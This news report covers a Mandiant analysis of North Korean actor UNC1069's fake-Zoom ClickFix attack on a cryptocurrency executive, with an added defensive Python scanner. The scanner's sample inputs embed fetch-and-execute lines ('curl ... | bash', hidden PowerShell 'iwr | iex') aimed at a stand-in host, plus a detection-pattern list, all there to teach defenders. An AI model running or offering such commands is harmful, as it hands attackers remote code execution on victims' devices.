North Korean hackers targeted an official at a cryptocurrency company with several unique pieces of malware deployed alongside multiple scams, including a fake Zoom meeting, according to a new report from incident responders. Google-owned Mandiant published a detailed examination of a recent attack involving UNC1069 – a financially-motivated threat actor based in North Korea – that stood out due to how tailored and targeted it was to the victim. The hackers initially contacted the victim through Telegram using the compromised account of another cryptocurrency executive. The victim was sent a Calendly link for a 30-minute meeting that contained a Zoom meeting link.
“The victim reported that during the call, they were presented with a video of a CEO from another cryptocurrency company that appeared to be a deepfake,” Mandiant explained. “While Mandiant was unable to recover forensic evidence to independently verify the use of AI models in this specific instance, the reported ruse is similar to a previously publicly reported incident with similar characteristics, where deepfakes were also allegedly used.” Once the victim was in the meeting, the hackers claimed there were audio issues and asked the victim to take several actions on their device to supposedly resolve them. The issues were a ruse to cover for a ClickFix attack – a technique in which hackers get malware onto a device by having the victim run commands to resolve fictitious technical issues.
In this case, the victim was directed to a web page with troubleshooting directions for both macOS systems and Windows systems. Embedded in the string of commands was one line that kicked off the infection chain. The victim followed the troubleshooting commands and their macOS device was infected. The first malicious files, which Mandiant called WAVESHAPER and HYPERCALL, are backdoors that allowed the hackers to install other tools that expanded their foothold on the victim’s device.
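The detail that matters for defenders is the shape of the lure: a block of plausible-looking troubleshooting commands with a single fetch-and-execute line buried in it. The following scanner is an added example written for this page, not code from Mandiant or from the report; the two troubleshooting blocks it checks are constructed to resemble the macOS and Windows lures described above (the URLs, commands and pattern list are assumptions, not the actual UNC1069 page). It flags only the line that downloads or decodes and then executes something, and can be pointed at a shell history file, a clipboard dump or a pasted "fix" page.

```python
import re
from typing import List, Tuple

# Constructed sample inputs (not the actual UNC1069 page): a plausible
# "fix your Zoom audio" block per platform with one malicious line embedded.
MACOS_SAMPLE = """\
sudo killall coreaudiod
system_profiler SPAudioDataType
curl -fsSL https://zoom-audio-fix.example/fix.sh | bash
sudo launchctl kickstart -k system/com.apple.audio.coreaudiod
"""

WINDOWS_SAMPLE = """\
Get-Service Audiosrv
Restart-Service Audiosrv
powershell -w hidden -c "iwr https://zoom-audio-fix.example/fix.ps1 | iex"
Get-PnpDevice -Class AudioEndpoint
"""

# (compiled pattern, reason). These are the generic ClickFix shapes:
# fetch-then-execute, inline decode-then-execute, quarantine bypass, hidden
# interpreter windows. The list is an assumption for illustration, not a
# complete signature set.
SUSPICIOUS_PATTERNS = [
    (re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b"),
     "remote script piped to a shell"),
    (re.compile(r"\bbase64\b[^|]*(-d|-D|--decode)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b"),
     "base64 decode piped to a shell"),
    (re.compile(r"\bosascript\s+-e\b"), "inline AppleScript execution"),
    (re.compile(r"\bxattr\b.*com\.apple\.quarantine"),
     "Gatekeeper quarantine attribute removal"),
    (re.compile(r"\b(iwr|Invoke-WebRequest|irm|Invoke-RestMethod|iex|Invoke-Expression)\b", re.I),
     "PowerShell download or inline execution"),
    (re.compile(r"(?<!\S)-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
     "encoded PowerShell command"),
    (re.compile(r"(?<!\S)-w(indowstyle)?\s+hidden\b", re.I), "hidden PowerShell window"),
    (re.compile(r"\b(mshta|certutil\s+-urlcache|bitsadmin\s+/transfer)\b", re.I),
     "Windows LOLBin download or execution"),
]


def flag_commands(block: str) -> List[Tuple[int, str, List[str]]]:
    """Scan a block of commands line by line.

    Returns (1-based line number, stripped line, reasons) for every line that
    matches at least one suspicious pattern; benign lines are not reported.
    """
    findings = []
    for n, line in enumerate(block.splitlines(), start=1):
        reasons = [why for pat, why in SUSPICIOUS_PATTERNS if pat.search(line)]
        if reasons:
            findings.append((n, line.strip(), reasons))
    return findings


def report(block: str, label: str) -> None:
    """Print findings for one block in a form a responder can paste into notes."""
    for n, line, reasons in flag_commands(block):
        print(f"[{label}] line {n}: {line}")
        for why in reasons:
            print(f"    - {why}")


if __name__ == "__main__":
    # Only the embedded fetch-and-execute line in each block should be reported.
    report(MACOS_SAMPLE, "macOS")
    report(WINDOWS_SAMPLE, "Windows")
```

Running it on the two constructed blocks reports line 3 of each and nothing else. In practice the same function can be fed `~/.zsh_history` or the PowerShell history file after a suspected ClickFix event to recover the exact line the victim executed, which is the fastest route to the first-stage payload URL.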
Mandiant said it found two data miners used by the threat actors called DEEPBREATH and CHROMEPUSH. DEEPBREATH enabled the hackers to steal credentials, browser data, user data from Telegram and other data from Apple Notes. The malware compresses all of the information into a ZIP archive and exfiltrates it to a remote server. CHROMEPUSH is a malicious tool made to look like a harmless browser extension for editing Google Docs offline.